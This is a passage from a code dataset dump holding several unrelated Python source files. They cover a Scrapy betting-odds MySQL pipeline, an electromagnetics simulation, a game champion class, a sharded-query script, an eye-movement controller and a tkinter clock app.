full=False)\n","repo_name":"ga4gh-rnaseq/rnaget-compliance-suite","sub_path":"compliance_suite/functions/schema.py","file_name":"schema.py","file_ext":"py","file_size_in_byte":6301,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"18719064886","text":"# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: https://doc.scrapy.org/en/latest/topics/item-pipeline.html\n\n\nimport copy\nimport pymysql\nimport time\nfrom twisted.enterprise import adbapi\n# from twisted.internet import reactor\nfrom .items import MatchItem\nfrom .items import OddsItem\nfrom .items import OuOddsItem\nfrom .items import YaOddsItem\nfrom .items import DxOddsItem\nfrom .items import ImmOuOddsItem\nfrom .items import ImmYaOddsItem\nfrom .items import ImmDxOddsItem\nfrom .comm.MsDebug import MsLog\n\n\nclass MsPipeline(object):\n def __init__(self, db_pool):\n self.db_pool = db_pool\n self.b_bets = {}\n self.b_league = {}\n self.b_fteam = {}\n self.initdata('b_bets').addCallback(self.parseData, 'b_bets')\n self.initdata('b_league').addCallback(self.parseData, 'b_league')\n self.initdata('b_fteam').addCallback(self.parseData, 'b_fteam')\n self.iCount = 0\n self.tickcount = int(round(time.time() * 1000))\n self.odds_item_list = []\n\n @classmethod\n def from_settings(cls, settings):\n db_pool = adbapi.ConnectionPool(\n 'pymysql',\n host=settings[\"MYSQL_HOST\"],\n db=settings[\"MYSQL_DB\"],\n user=settings[\"MYSQL_USER\"],\n password=settings[\"MYSQL_PASSWORD\"],\n charset=\"utf8\",\n cursorclass=pymysql.cursors.DictCursor,\n use_unicode=True,\n autocommit=0\n )\n return cls(db_pool)\n\n def parseData(self, datas, table):\n print(\"MS - printData[{0}]...\".format(table))\n for data in datas:\n if table == 'b_bets':\n self.b_bets[data['name']] = data['id']\n elif table == 'b_league':\n self.b_league[data['name']] = data['id']\n elif table == 'b_fteam':\n self.b_fteam[data['name']] = data['id']\n\n def _initCommit(self, cur):\n print('MS - set autocommit')\n cur.execute('set autocommit=0;')\n\n def initCommit(self):\n return self.db_pool.runInteraction(self._initCommit)\n\n def initdata(self, table):\n print('MS - initdata.....')\n return self.db_pool.runQuery(\"select * from {0}\".format(table))\n\n def handle_error(self, failure, item):\n print('插入数据失败,原因:{},错误对象:{}'.format(failure, item))\n\n # 获取博彩公司ID\n def getbid(self, cur, tablename, name):\n try:\n sql = 'SELECT id FROM {0} WHERE name=%(name)s'.format(tablename)\n values = {\n 'name': name\n }\n cur.execute(sql, values)\n data = cur.fetchone()\n if data is not None:\n return data['id']\n return -1\n except Exception as e:\n print(e)\n\n # 添加博彩公司记录\n def addBaseItem(self, cur, tablename, name, fname=''):\n try:\n sql = 'INSERT INTO {0}(`name`, `fname`, `remark`) VALUES(%(name)s, %(fname)s, %(remark)s)'.format(tablename)\n values = {\n 'name': name,\n 'fname': fname,\n 'remark': ''\n }\n cur.execute(sql, values)\n return True\n except Exception as e:\n print(e)\n return False\n\n # 获取赔率ID\n def getOddsId(self, cur, item):\n try:\n tablename = self.getTableNameByItem(item)\n\n if tablename == '':\n return -2\n\n sql = '''\n SELECT id FROM {0} WHERE mid=%(mid)s and bid=%(bid)s and cdate=%(cdate)s\n '''.format(tablename)\n values = {\n 'mid': item['mid'],\n 'bid': item['bid'],\n 'cdate': item['cdate']\n }\n\n cur.execute(sql, values)\n data = cur.fetchone()\n if data is not None:\n return data['id']\n return -1\n except Exception as e:\n print(e)\n\n # 获取比赛ID\n def getmid(self, cur, mid):\n try:\n sql = 'SELECT id FROM matchdata WHERE mid=%(mid)s'\n values = {\n 'mid': mid\n }\n cur.execute(sql, values)\n data = cur.fetchone()\n if data is not None:\n return data['id']\n return -1\n except Exception as e:\n print(e)\n\n # 添加比赛记录\n def addmItem(self, cur, item):\n try:\n sql = '''\n INSERT INTO matchdata(`mid`, `lid`, `mtid`, `jq`, `dtid`, `sq`, `mdate`)\n VALUES(%(mid)s, %(lid)s, %(mtid)s, %(jq)s, %(dtid)s, %(sq)s, %(mdate)s) \n '''\n\n values = {\n 'mid': item['mid'],\n 'lid': item['lid'],\n 'mtid': item['mtid'],\n 'jq': item['jq'],\n 'dtid': item['dtid'],\n 'sq': item['sq'],\n 'mdate': item['mdate']\n }\n cur.execute(sql, values)\n return True\n except Exception as e:\n print(e)\n return False\n\n # 更新比赛记录\n def updmItem(self, cur, item):\n try:\n sql = '''\n UPDATE matchdata\n SET `mid`=%(mid)s, `lid`=%(lid)s, `mtid`=%(mtid)s, `jq`=%(jq)s, \n `dtid`=%(dtid)s, `sq`=%(sq)s, `mdate`=%(mdate)s\n WHERE `id` = %(id)s \n '''\n\n values = {\n 'id': item['id'],\n 'mid': item['mid'],\n 'lid': item['lid'],\n 'mtid': item['mtid'],\n 'jq': item['jq'],\n 'dtid': item['dtid'],\n 'sq': item['sq'],\n 'mdate': item['mdate']\n }\n cur.execute(sql, values)\n return True\n except Exception as e:\n print(e)\n return False\n\n def process_item(self, items, spider):\n try:\n # 对象拷贝 深拷贝\n asynItems = copy.deepcopy(items) # 需要导入import copy\n\n if isinstance(asynItems, MatchItem):\n query = self.db_pool.runInteraction(self.process_md_item, asynItems)\n elif isinstance(asynItems, OuOddsItem) or isinstance(asynItems, YaOddsItem) or isinstance(asynItems, DxOddsItem):\n query = self.db_pool.runInteraction(self.process_odds_item, asynItems)\n elif isinstance(asynItems, OddsItem):\n query = self.db_pool.runInteraction(self.insert_odds, asynItems)\n query.addErrback(self.handle_error, asynItems)\n # return item\n # print('MS - iCount: {} TimeCount: {}'.format(self.iCount, int(round(time.time() * 1000)) - self.tickcount))\n self.iCount += 1\n except Exception as e:\n print('process_item err:{0}'.format(e))\n\n def process_md_item(self, cursor, item):\n try:\n # 补全联赛信息\n # lsid = self.getbid(cursor, 'b_league', item['lname'])\n lsid = self.b_league.get(item['lname'], -1)\n if lsid == -1:\n self.addBaseItem(cursor, 'b_league', item['lname'])\n lsid = self.getbid(cursor, 'b_league', item['lname'])\n if lsid == -1:\n return\n self.b_league[item['lname']] = lsid\n item['lid'] = lsid\n\n # 补全球队信息-主队\n # mtid = self.getbid(cursor, 'b_fteam', item['mtname'])\n mtid = self.b_fteam.get(item['mtname'], -1)\n if mtid == -1:\n self.addBaseItem(cursor, 'b_fteam', item['mtname'], item['mtfname'])\n mtid = self.getbid(cursor, 'b_fteam', item['mtname'])\n\n if mtid == -1:\n return\n self.b_fteam[item['mtname']] = mtid\n item['mtid'] = mtid\n\n # 补全球队信息-客队\n # dtid = self.getbid(cursor, 'b_fteam', item['dtname'])\n dtid = self.b_fteam.get(item['dtname'], -1)\n if dtid == -1:\n self.addBaseItem(cursor, 'b_fteam', item['dtname'], item['dtfname'])\n dtid = self.getbid(cursor, 'b_fteam', item['dtname'])\n\n if dtid == -1:\n return\n\n self.b_fteam[item['dtname']] = dtid\n item['dtid'] = dtid\n\n # 添加或者更新比赛表数据\n imid = self.getmid(cursor, item['mid'])\n if imid == -1:\n self.addmItem(cursor, item)\n else:\n item['id'] = imid\n return self.updmItem(cursor, item)\n return True\n except Exception as e:\n print(e)\n return False\n\n def process_odds_item(self, cursor, item):\n try:\n # 补全博彩公司数据\n bid = self.b_bets.get(item['bname'], -1)\n if bid == -1:\n self.addBaseItem(cursor, 'b_bets', item['bname'], '')\n bid = self.getbid(cursor, 'b_bets', item['bname'])\n if bid == -1:\n return False\n self.b_bets[item['bname']] = bid\n item['bid'] = bid\n\n return self.addOddsItem(cursor, item)\n return True\n except Exception as e:\n print(e)\n return False\n\n def insert_odds(self, cursor, item):\n try:\n # 补全博彩公司数据\n bid = self.b_bets.get(item['bname'], -1)\n if bid == -1:\n self.addBaseItem(cursor, 'b_bets', item['bname'], '')\n bid = self.getbid(cursor, 'b_bets', item['bname'])\n if bid == -1:\n return False\n self.b_bets[item['bname']] = bid\n item['bid'] = bid\n\n insert_sql = item.get_insert_sql()\n cursor.execute(insert_sql)\n return True\n except Exception as e:\n print(e)\n return False\n\n def close_spider(self, spider):\n self.db_pool.close()\n MsLog.debug('[{0}] 结束'.format(spider.name))\n","repo_name":"mansoy/MsSpider","sub_path":"MsSpider/MsPipeline.py","file_name":"MsPipeline.py","file_ext":"py","file_size_in_byte":10227,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"28232962561","text":"import KUEM as EM\nimport numpy as np\nimport time as t\n\n# The size of the system\nSize = 49\n\nShowCount = 25\nbase_dx = np.array([25, 25, 25], dtype = float)\nbase_N = np.array([1, 1, 1], dtype = int)\nbase_dt = 2.5\nOmega = 2 * np.pi / 5\napprox_n = 100\nT = 10\nTRes = 0.1\n\n# -------------------------------------------------------------------------------\n\ndef J_LineCurrent(dx, N, x0, c, mu0):\n J = np.zeros((np.prod(N), 4))\n J[int(N[0] / 2) + 30 + (int(N[1] / 2) + 15) * N[0] :: N[0] * N[1], 3] = 1\n \n # Create function to return J\n # t: The time\n def GetJ(t):\n if Omega * t < 2 * np.pi:\n return J * np.sin(Omega * t)\n \n else:\n return J * 0\n \n # Return the function\n return GetJ \n\ndx = base_dx / (Size - 1)\ndt = base_dt / (Size - 1)\nN = base_N * Size\nN[2] = 1\nx0 = np.array(-base_dx / 2, dtype = float)\nEvalCount = int(T / dt)\nIntEvalCount = int(np.ceil(TRes / dt))\n\nIndex1 = np.floor(np.linspace(0, 1, ShowCount, endpoint = False) * N[0])\nIndex2 = np.floor(np.linspace(0, 1, ShowCount, endpoint = False) * N[1])\nIndex1, Index2 = np.meshgrid(Index1, Index2)\nx = np.empty((ShowCount, ShowCount, 3))\nx[:, :, 0] = x0[0] + Index1 * dx[0] * 1.0001\nx[:, :, 1] = x0[1] + Index2 * dx[1] * 1.0001\nx[:, :, 2] = 0\n\nSim = EM.sim(N, delta_x = base_dx, dt = dt, J = J_LineCurrent, approx_n = approx_n, x0 = x0, boundaries = [[\"flat\", \"flat\"], [\"flat\", \"flat\"], \"periodic\"])\n\ndef LinScale(x):\n return x\n\n#print(\"Estimated time: \" + str(Sim.estimate_dynamics(exact = False) * EvalCount))\n\n# Create video\nPoints = EM.sample_points_plane(np.array([1, 0, 0]), np.array([0, 1, 0]), np.array([0, 0, 0]), base_dx, np.array([100, 100], dtype = int))\nVideo = EM.video(\"DynTest\", FPS = 30)\nVideo.plot_scalar(Sim.sample_values(Sim.get_A()[:, 2], Points), clim = np.array([-0.08, 0.08]))\n#figB, axB, VideoB = EM.video_init(\"LineCurrentAlternatingB\", FPS = 30)\n#figS, axS, VideoS = EM.video_init(\"LineCurrentAlternatingS\", FPS = 30)\n#figA, axA, VideoA = EM.video_init(\"LineCurrentAlternatingA\", FPS = 30)\n\n#_, plotB = Sim.plot_B(x, axis1 = x[:, :, 0], axis2 = x[:, :, 1], clim = np.array([0.0005, 0.3]), ax = axB, video = True)\n#_, plotS = Sim.plot_S(x, axis1 = x[:, :, 0], axis2 = x[:, :, 1], clim = np.array([0.00001, 0.01]), ax = axS, video = True)\n#_, plotA = Sim.plot_AComp(x, 3, clim = np.array([-0.05, 0.05]), ax = axA, scale = LinScale)\n\ntime1 = t.time()\n\nfor i in range(int(EvalCount / IntEvalCount)):\n # Update potential\n for _ in range(IntEvalCount):\n Sim.step(exact = True)\n print(i / int(EvalCount / IntEvalCount))\n # Draw B field\n Video.update_scalar(Sim.sample_values(Sim.get_A()[:, 2], Points))\n #Sim.update_plot_B(plotB, x)\n #Sim.update_plot_S(plotS, x)\n #Sim.update_plot_AComp(plotA, x, 3, scale = LinScale)\n Video.update()\n # Update video\n #EM.video_update(figB, VideoB)\n #EM.video_update(figS, VideoS)\n #EM.video_update(figA, VideoA)\n\ntime2 = t.time()\n\nprint(\"Time: \" + str(time2 - time1))\n\n#Test.plot_B(x, axis1 = x[:, :, 0], axis2 = x[:, :, 1], clim = np.array([0.001, 0.1]), scale = scale)\n\nVideo.finish()\n# Close video\n#EM.video_finish(figB, VideoB)\n#EM.video_finish(figS, VideoS)\n#EM.video_finish(figA, VideoA)","repo_name":"RasmusBruhn/KUEM","sub_path":"OldExamples/EMDynTest.py","file_name":"EMDynTest.py","file_ext":"py","file_size_in_byte":3224,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"27006204201","text":"from datetime import datetime\r\n\r\ncurrent_date = datetime.now().date().weekday()\r\n\r\nrecent_date = datetime(year=2022, month=2, day=4)\r\n# print(recent_date)\r\n\r\ndict = {\r\n \"One\": 1,\r\n \"2\": 2\r\n}\r\n\r\nprint(list(dict.keys())[0])","repo_name":"Vincent-Muchiri/Python-Programming","sub_path":"Stock and Crypto Price Alert App[36] - API, SMS, Email/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":227,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"31508855405","text":"import os\nimport random\nimport json\nfrom pathlib import Path\nfrom typing import List, Union, TYPE_CHECKING, Iterable\n\nfrom battle.construct.enum import EventType, Stat, State\n\nif TYPE_CHECKING:\n from battle.construct import Team\n from battle.construct.barrier import Barrier\n\nPROJECT_DIR = str(Path(os.path.abspath(__file__)).parent.parent.absolute())\n\n\ndef load_champion_data(path):\n result = {}\n with open(path + \"/resource/champion.json\", \"r\") as ch_json:\n champion_data = json.load(ch_json)\n list(map(lambda d: result.update({d[\"championId\"]: d}), champion_data))\n return result\n\n\nCHAMPION_DATA = load_champion_data(PROJECT_DIR)\n\n\nclass Champion:\n def __init__(self, champ_data, team: \"Team\"):\n self.name = champ_data[\"name\"]\n self.uuid = champ_data[\"uuid\"]\n self.id = champ_data[\"championId\"]\n self.level = champ_data[\"level\"]\n self.team: Team = team\n self.traits = champ_data[\"traits\"]\n self.skill = champ_data[\"skill\"]\n\n self.state: List[State] = []\n self.buff = {s: [] for s in Stat}\n self.event = {e: [] for e in EventType}\n self.stat = {s: champ_data[s] for s in Stat}\n self.hp = self.stat[Stat.MAX_HP]\n self.mp = self.stat[Stat.MP]\n self.barrier: List['Barrier'] = []\n\n self.action = None\n self.target: Union[Champion, None] = None\n\n def heal(self, value):\n self.hp = min(self.get_stat(Stat.MAX_HP), self.hp + value)\n\n def get_stat(self, stat_type) -> Union[int, float]:\n origin = self.stat[stat_type]\n buff = 0\n for b in self.buff[stat_type]:\n if b.is_absolute:\n origin += b.result(stat_type)\n continue\n buff += b.result(stat_type)\n\n return origin + (origin * buff)\n\n def use_barrier(self, dmg: Union[int, float]) -> Union[int, float]:\n residual = dmg\n for b in self.barrier:\n residual = b.calc(residual)\n if residual:\n break\n return residual\n\n def cause_event(self, event_type, **kwargs):\n for e in self.event[event_type]:\n e.get(event_type, **kwargs)\n\n def generate_mana(self, mana, cause_event=True):\n if cause_event:\n self.cause_event(EventType.GENERATE_MP, mp=mana, champion=self)\n self.mp = min(self.mp + mana, self.get_stat(Stat.MAX_MP))\n\n def get_damage(self, damage) -> Union[int, float, None]:\n damage.set_armor(self.get_stat(Stat.ARMOR))\n damage.set_magic_resistance(self.get_stat(Stat.MAGIC_RESISTANCE))\n damage.set_damage_reduce(self.get_stat(Stat.DAMAGE_REDUCE))\n reduced_damage = damage.calc()\n self.generate_mana(damage.get_pre_mitigated() * 0.06)\n\n if reduced_damage is None:\n print(f'{self.name}: Avoid damage')\n return None\n residual_damage = self.use_barrier(reduced_damage)\n self.hp = max(self.hp - residual_damage, 0)\n self.cause_event(EventType.GET_DAMAGE, damage=reduced_damage, hp=self.hp, max_hp=self.get_stat(Stat.MAX_HP))\n\n if not self.hp:\n self.set_death()\n print(f'{self.name}: Get Damage {reduced_damage} HP left {self.hp}')\n\n return reduced_damage\n\n def is_critical(self) -> bool:\n chance = min(100, self.get_stat(Stat.CRITICAL_CHANCE))\n result = random.choices([True, False], weights=[chance, 100 - chance])\n\n return result[0]\n\n def is_dodge(self) -> bool:\n chance = min(100, self.get_stat(Stat.DODGE_CHANCE))\n result = random.choices([True, False], weights=[chance, 100 - chance])\n\n return result[0]\n\n def is_dead(self) -> bool:\n if State.DEATH in self.state:\n return True\n return False\n\n def is_mp_full(self) -> bool:\n if self.mp >= self.get_stat(Stat.MAX_MP):\n return True\n return False\n\n def set_death(self):\n try:\n if self.action is not None:\n self.action.interrupt()\n self.action = None\n except RuntimeError:\n print('Action Already terminated')\n self.state = [State.DEATH]\n\n def __repr__(self):\n return f'{self.name}'\n\n def __iter__(self) -> Iterable[str]:\n result = [\n (\"name\", self.name),\n (\"uuid\", self.uuid),\n (\"id\", self.id),\n (\"level\", self.level),\n (\"team\", str(self.team)),\n (\"traits\", self.traits),\n (\"skill\", self.skill),\n (\"state\", self.state),\n (\"hp\", self.hp),\n (\"mp\", self.mp),\n ]\n stat = {}\n barrier = 0\n for s in Stat:\n stat[s] = self.get_stat(s)\n for b in self.barrier:\n barrier += b.value\n result.append((\"stat\", stat))\n result.append((\"barrier\", barrier))\n\n return iter(result)\n","repo_name":"TikaWorld/TFT-simulator","sub_path":"src/battle/construct/champion.py","file_name":"champion.py","file_ext":"py","file_size_in_byte":4899,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38659639281","text":"import sys\nfrom framework.storage.mysql import MySQL\nfrom framework.storage.mysql_pool import MySQLPool\nfrom multiprocessing import Pool\nfrom pprint import pprint\n\nsql_file_name = sys.argv[1]\ntry:\n pool_id = sys.argv[2]\nexcept IndexError:\n pool_id = MySQLPool.MAIN\n \npool = MySQL.get_pool(pool_id)\n\ntry:\n num_threads = sys.argv[3]\nexcept IndexError:\n num_threads = None\n\n\ndef get_query_string(file_name):\n with open('sql/' + file_name) as data_file:\n return data_file.read()\n \n \ndef get_query_runner(pool, query_str):\n # bind pool and query string to a function\n # that can make a query per shard id \n def run_one_query(shard_id):\n shard = pool.get_shard(shard_id)\n query_res = shard.query(query_str, None, True)\n shard.close() \n return query_res\n \n return run_one_query\n \n\nrun_one_query = get_query_runner(pool, get_query_string(sql_file_name) ) \n\nres = []\nwith Pool(num_threads) as p:\n res = p.map(run_one_query, range(pool.get_num_shards()))\n\n\n\npprint(res)\n","repo_name":"jordancode/phil_skeleton","sub_path":"phil_skeleton/scripts/all_shard_query.py","file_name":"all_shard_query.py","file_ext":"py","file_size_in_byte":1035,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"43184052499","text":"import sys\n\nimport numpy\n\nfrom eye_plant import Eye\n\nfrom scipy.linalg import block_diag\n\n# the following two function are used to store and retrieve\n# the appropriate matrices specific to this eye problem\n# This is done to avoid recomputing these\n\ndef compute_matrices(max_dur, dt):\n\n eye = Eye(dt=dt)\n\n # make F and G matrices as in the book\n F = [numpy.eye(eye.state_dim)]\n for _ in range(max_dur - 1):\n #add to front of list\n F.insert(0, numpy.dot(F[0], eye.A))\n\n # block matrix\n F = numpy.bmat(F)\n\n # block diagonal matrix\n G = block_diag(*[eye.B for _ in range(max_dur)])\n\n numpy.savez('matrices', F=F, G=G)\n\n\ndef get_matrices(duration):\n state_dim = 4\n control_dim = 2\n data = numpy.load('matrices.npz')\n F = data['F']\n G = data['G']\n F = F[:, (-state_dim * duration):]\n G = G[:(state_dim * duration), :control_dim * duration]\n\n return F, G\n\n\n# if this file is run, the matrices will be computed\nif __name__ == '__main__':\n dt = float(sys.argv[1])\n compute_matrices(max_dur=300, dt=dt)\n\n\nclass Optimal_Eye(object):\n \"\"\"The optimal eye controller in section 11.4 of Shadmehr book\n Signal-Dependent noise version\"\"\"\n\n def __init__(self, plant):\n #need plant and cost to construct the controller\n self.plant = plant\n\n def control_seq(self, init_state, target, k):\n \"\"\"Computes control sequence for the assigned duration.\n\n Parameters:\n -----------\n\n init_state: initial_state of the system\n target: the goal target, see pg.318\n k: the parameter in signal-dep noise on control\n \"\"\"\n\n # compute the duration from experimental data\n # see pg 285 in Shadmehr book\n distance = numpy.abs(target - init_state[0][0])\n duration = int(round(2.7 * distance + 23))\n\n # cost matrices, see section 11.4\n T = numpy.diag([5e9, 1e6, 80, 80])\n L = numpy.eye(duration * self.plant.B.shape[1])\n\n # set up matrices\n L = numpy.matrix(L, dtype=numpy.float64)\n C = numpy.matrix(self.plant.C, dtype=numpy.float64)\n F, G = get_matrices(duration)\n F = numpy.matrix(F, dtype=numpy.float64)\n G = numpy.matrix(G, dtype=numpy.float64)\n T = numpy.matrix(T, dtype=numpy.float64)\n # A to the power of duration\n A_p = numpy.dot(self.plant.A, F[:, :self.plant.state_dim])\n A_p = numpy.matrix(A_p, dtype=numpy.float64)\n\n S = G.T * F.T * C.T * T * C * F * G\n diag_S = numpy.diag(numpy.diag(S))\n temp = L + S + ((k**2) * diag_S)\n temp = numpy.linalg.inv(temp)\n temp = temp * G.T * F.T * C.T * T\n temp = temp * (target - C * A_p * init_state)\n\n control = temp\n return control\n","repo_name":"youssefzaky/phd","sub_path":"gaze_control/gaze_control/1D/optimal_eye.py","file_name":"optimal_eye.py","file_ext":"py","file_size_in_byte":2763,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"39137679261","text":"import tkinter as tk\nimport tkinter.ttk as ttk\nfrom tkinter import font\nfrom tkinter import messagebox\nfrom tkinter.colorchooser import askcolor\n\nimport pygubu\n\nimport sys\nimport platform\nimport datetime\n\nimport src.Config as Config\nimport src.Logger as Logger\nimport src.About as About\nimport src.Fonts as Fonts\nimport src.License as License\nimport src.utils.pyDigitalKlock_utils as utils\nimport src.utils.fonts_utils as fu\n\nfrom src.projectPaths import *\n\n\nclass FirstApp:\n \"\"\"Support logic for the GUI of pyDigitalKlock.\n\n GUI elements held in pyDigitalKlock.ui, created using pygubu-designer.\n \"\"\"\n\n def __init__(self, myConfig, logger, master=None):\n\n self.logger = logger\n self.config = myConfig\n self.foreground = self.config.FOREGROUND\n self.background = self.config.BACKGROUND\n self.transparent = False\n\n self.row1 = 0\n self.new_font = None\n\n # Create a builder and setup resources path (if you have images)\n self.builder = builder = pygubu.Builder()\n builder.add_resource_path(RESOURCE_PATH)\n\n # Load an ui file\n builder.add_from_file(PROJECT_UI)\n\n # Create the mainwindow\n self.mainwindow = builder.get_object(\"mainwindow\", master)\n self.width = self.mainwindow.cget(\"width\")\n self.mainwindow.overrideredirect(True)\n\n # Create transparent window\n self.mainwindow.wm_attributes(\"-topmost\", True)\n self.mainwindow.wm_attributes(\"-transparentcolor\", \"gray\")\n self.mainwindow.wait_visibility()\n\n self.myAbout = About.About(self.mainwindow, self.config.NAME, self.config.VERSION)\n self.myLicense = License.License(self.mainwindow, self.config.NAME, self.config.VERSION)\n self.myFont = Fonts.Font(self.mainwindow, logger)\n\n self.lbl_current_time = builder.get_object(\"lblTime\", master)\n self.lbl_today_date = builder.get_object(\"lblDate\", master)\n self.lbl_current_state = builder.get_object(\"lblState\", master)\n self.lbl_idle_time = builder.get_object(\"lblIdle\", master)\n\n self.lbl_current_time.configure(font=font.Font(family=self.config.FONT_NAME,size=self.config.FONT_SIZE,weight=\"normal\",))\n\n # Set main menu\n self.mainmenu = mainmenu = builder.get_object(\"mainmenu\", self.mainwindow)\n self.mainwindow.configure(menu=mainmenu)\n self.mainmenu.bind_all(\"\", self.quit) # Bind menu quit option to self.quit.\n\n # Connect to Delete event\n self.mainwindow.protocol(\"WM_DELETE_WINDOW\", self.quit)\n\n # Connect callbacks\n builder.connect_callbacks(self)\n\n # Bind mouse, so app can be moved.\n self.mainwindow.bind(\"\", self.startMove)\n self.mainwindow.bind(\"\", self.stopMove)\n self.mainwindow.bind(\"\", self.moving)\n\n self.mainwindow.geometry(\"+%s+%s\" % (self.config.X_POS, self.config.Y_POS))\n\n self.set_check()\n self.set_colours()\n self.set_time_date()\n\n def on_items_clicked(self, itemid):\n \"\"\"Handle the menu options.\"\"\"\n if itemid == \"mfile_quit\":\n self.quit()\n if itemid == \"mColour_foreground\":\n colours = askcolor(title=\"Choose colour of foreground\")\n self.foreground = colours[1]\n self.set_colours()\n if itemid == \"mColour_background\":\n colors = askcolor(title=\"Choose colour of background\")\n self.background = colors[1]\n self.set_colours()\n if itemid == \"mcolour_transparent\":\n self.set_colours()\n if itemid == \"mFonts_fonts\":\n self.show_font_dialog()\n if itemid == \"mhelp_license\":\n self.show_about_license()\n if itemid == \"mhelp_about\":\n self.show_about_dialog()\n\n def show_about_license(self):\n \"\"\"Call the about dialog.\"\"\"\n self.logger.info(f\" Running About Dialog \")\n self.myLicense.show_license_dialog()\n self.logger.info(f\" Closing About Dialog \")\n\n def show_about_dialog(self):\n \"\"\"Call the about dialog.\"\"\"\n self.logger.info(f\" Running About Dialog \")\n self.myAbout.show_about_dialog()\n self.logger.info(f\" Closing About Dialog \")\n\n def show_font_dialog(self):\n \"\"\"Call the font dialog.\"\"\"\n self.logger.info(f\" Running Font Dialog \")\n self.myFont.show_font_dialog()\n self.logger.info(f\" Closing Font Dialog \")\n\n def set_time_date(self):\n \"\"\"Update the screen, current time, date & idle time.\n\n TODO Stop guessing at length of idle time and try and use ttk measure function.\n \"\"\"\n\n strNow = datetime.datetime.now()\n\n # Set the time.\n var = self.builder.get_variable(\"current_time\")\n var.set(f\"{strNow:%H:%M:%S}\")\n\n # Set the date\n var = self.builder.get_variable(\"today_date\")\n var.set(f\"{ strNow:%A %d %B %Y}\")\n\n # Set the state\n var = self.builder.get_variable(\"current_state\")\n var.set(f\"{utils.get_state()}\")\n\n # Set the state\n idle = int(utils.get_idle_duration())\n if idle > 5: # Only print idles time if greater then 5 seconds.\n strIdle = f\"idle : {utils.formatSeconds(idle)}\"\n length = len(strIdle)\n strIdle = strIdle.rjust(58 - length, \" \") # Guess at 58 characters for right justification.\n else:\n strIdle = \"\"\n\n var = self.builder.get_variable(\"idle_time\") # This could change if the font is changed.\n var.set(f\"{strIdle}\")\n\n self.set_row()\n\n # Call the set_time_date() function every 1 second.\n self.mainwindow.after(1000, self.set_time_date)\n\n def set_row(self):\n \"\"\"Checks if a new font has been selected and sets accordingly.\n\n myFont is initially set to -1, set to -2 in the font chosen is not installed.\n \"\"\"\n if self.myFont.row == -1: # font not selected from menu.\n return\n if self.myFont.row == -2: # Selected font not installed.\n return\n if self.myFont.row != self.row1:\n self.row1 = self.myFont.row\n self.new_font, self.config.FONT_NAME, self.config.FONT_SIZE = fu.set_font(self.row1)\n self.lbl_current_time.configure(font=self.new_font)\n\n def set_check(self):\n \"\"\"Checks whether the transparency menu has been clicked.\"\"\"\n variable = self.builder.get_variable(\"mcolour_transparent_clicked\")\n variable.set(self.config.TRANSPARENT)\n\n def set_colours(self):\n \"\"\"Sets the foreground and background colour of the main window and all labels.\n Is called initially and from the menu when a colour chooser is selected.\n Also sets the transparency of all widgets.\n \"\"\"\n variable = self.builder.get_variable(\"mcolour_transparent_clicked\")\n self.transparent = variable.get()\n\n if self.transparent:\n trans_colour = \"grey\"\n self.config.TRANSPARENT = True\n else:\n trans_colour = self.background\n self.config.TRANSPARENT = False\n\n self.mainwindow.configure(background=trans_colour)\n self.mainmenu.configure(background=trans_colour, foreground=self.foreground)\n self.lbl_current_time.configure(\n background=trans_colour, foreground=self.foreground\n )\n self.lbl_today_date.configure(\n background=trans_colour, foreground=self.foreground\n )\n self.lbl_current_state.configure(\n background=trans_colour, foreground=self.foreground\n )\n self.lbl_idle_time.configure(\n background=trans_colour, foreground=self.foreground\n )\n\n # Used to move the app.\n # Binds start and sop to mouse left click and move to mouse move.\n def startMove(self, event):\n self.x = event.x\n self.y = event.y\n\n def stopMove(self, event):\n self.x = None\n self.y = None\n\n def moving(self, event):\n x = event.x_root - self.x\n y = event.y_root - self.y\n self.config.X_POS = x\n self.config.Y_POS = y\n self.mainwindow.geometry(\"+%s+%s\" % (x, y))\n\n def quit(self, event=None):\n \"\"\"Saves the current configuration and closes app.\n The font name and size has already been amened in the config class.\n self.config.TRANSPARENT also already set.\n \"\"\"\n try:\n self.config.FOREGROUND = self.foreground\n self.config.BACKGROUND = self.background\n self.config.writeConfig()\n except Exception as e:\n logger.debug(f\" Error occurred during saving of config: {e}\")\n\n self.mainwindow.quit()\n\n def run(self):\n \"\"\"Runs the main GUI loop.\"\"\"\n self.mainwindow.mainloop()\n\n\ndef main():\n \"\"\"Main function to run the thing.\"\"\"\n\n logger = Logger.get_logger(str(LOGGER_PATH)) # Create the logger.\n myConfig = Config.Config(CONFIG_PATH, logger) # Create the config.\n\n logger.info(\"-\" * 100)\n logger.info(f\" Running {myConfig.NAME} Version {myConfig.VERSION} \")\n logger.debug(f\" {platform.uname()}\")\n logger.debug(f\" Python Verion {platform.python_version()}\")\n logger.debug(\"\")\n logger.debug(f\" PROJECT_PATH :: {PROJECT_PATH}\")\n logger.debug(f\" MAIN_PATH :: {MAIN_PATH}\")\n logger.debug(f\" PROJECT_UI :: {PROJECT_UI}\")\n logger.debug(f\" RESOURCE_PATH:: {RESOURCE_PATH}\")\n logger.debug(f\" FONTS_PATH :: {FONTS_PATH}\")\n logger.debug(f\" CONFIG_PATH :: {CONFIG_PATH}\")\n logger.debug(f\" LOGGER_PATH :: {LOGGER_PATH}\")\n logger.debug(\"\")\n\n if getattr(sys, \"frozen\", False) and hasattr(sys, \"_MEIPASS\"):\n logger.debug(\" Running in a PyInstaller bundle\")\n else:\n logger.debug(\" Running in a normal Python process\")\n\n app = FirstApp(myConfig, logger)\n app.run()\n\n logger.info(f\" Ending {myConfig.NAME} Version {myConfig.VERSION} \")\n logger.info(\"-\" * 100)\n\n\nif __name__ == \"__main__\":\n 